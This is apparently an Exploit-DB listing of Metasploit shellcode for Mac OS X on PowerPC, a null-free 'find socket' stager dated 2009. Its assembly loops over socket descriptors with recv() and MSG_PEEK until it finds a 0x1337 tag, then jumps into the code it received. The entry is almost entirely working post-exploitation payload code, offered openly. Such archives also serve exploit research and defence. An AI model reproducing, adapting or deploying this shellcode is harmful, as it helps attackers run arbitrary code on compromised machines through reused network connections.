OSX/PPC - Stager Sock Find MSG_PEEK + Null-Free Shellcode

EDB-ID:

43612

CVE:

N/A




Platform:

OSX_PPC

Date:

2009-01-01


;;
;
;        Name: stager_sock_find_peek
;   Qualities: Null-Free
;   Platforms: MacOS X / PPC
;     Authors: H D Moore < hdm [at] metasploit.com >
;     Version: $Revision: 1.1 $
;     License:
;
;        This file is part of the Metasploit Exploit Framework
;        and is subject to the same licenses and copyrights as
;        the rest of this package.
;
; Description:
;
;        This payload will recv() downward until the read
;        data contains the search tag (0xXXXX1337). Once the
;        tag is located, it will jump into the payload. The
;        recv() call is passed the MSG_PEEK flag, the stage
;        will need to flush the recv() queue before doing
;        something like dup2'ing a shell.
;
;;

.globl _main
.text
_main:
	li		r29, 0xfff
	li		r30, 0xfff
	addic.	r28, r29, -0xfff +1

findsock:
	subf.   r30, r28, r30
	blt		_main

	subi	r0, r29, 0xfff - 102
	mr		r3, r30
	subi	r4, r1, 4104
	li		r5, 4095
	subi	r6, r29, 0xfff - 0x82
	.long	0x44ffff02
	xor.	r6, r6, r6
	
	lhz		r27, -4104(r1)
	cmpwi	r27, 0x1337
	bne		findsock

gotsock:
	subi	r4, r1, 4100
	mtctr	r4
	blectr	
	xor.	r6, r6, r6